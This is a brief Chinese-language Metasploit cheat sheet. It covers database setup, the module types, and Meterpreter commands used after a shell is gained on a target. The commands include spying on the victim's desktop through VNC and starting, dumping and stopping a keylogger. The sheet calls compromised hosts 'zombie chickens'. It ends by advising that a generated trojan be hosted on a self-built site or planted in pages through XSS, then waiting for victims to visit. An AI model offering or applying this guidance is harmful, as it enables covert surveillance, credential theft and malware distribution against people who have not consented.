缓冲区溢出的基本知识点:
https://xz.aliyun.com/t/3784
https://baijiahao.baidu.com/s?id=1668767940652851301&wfr=spider&for=pc
运行前的初始化:
service postgresql start //运行postgresql服务
msfdb init //初始化MSF数据库
运行metasploit:
msfconsole //进入msf控制台
msf>db_status //查看MSF数据库连接状态
msf模块:
攻击模块:exploit
辅助模块(扫描等操作):auxiliary
攻击载荷模块:payload
拿到shell的一些常用命令:
help //查看木马提供的各种功能
sysinfo //查看对方的系统信息
background //将当前会话转入后台执行
sessions -l //显示在后台运行的会话
sessions -i n //使用第n个前台
run vnc //监控肉鸡的桌面
keyscan_start //监听键盘输入
keyscan_dunp //导出监听内容
keyscan_stop //停止监听
生成木马后,可自己搭建网站或者通过xss将木马URL挂在页面上,待肉鸡访问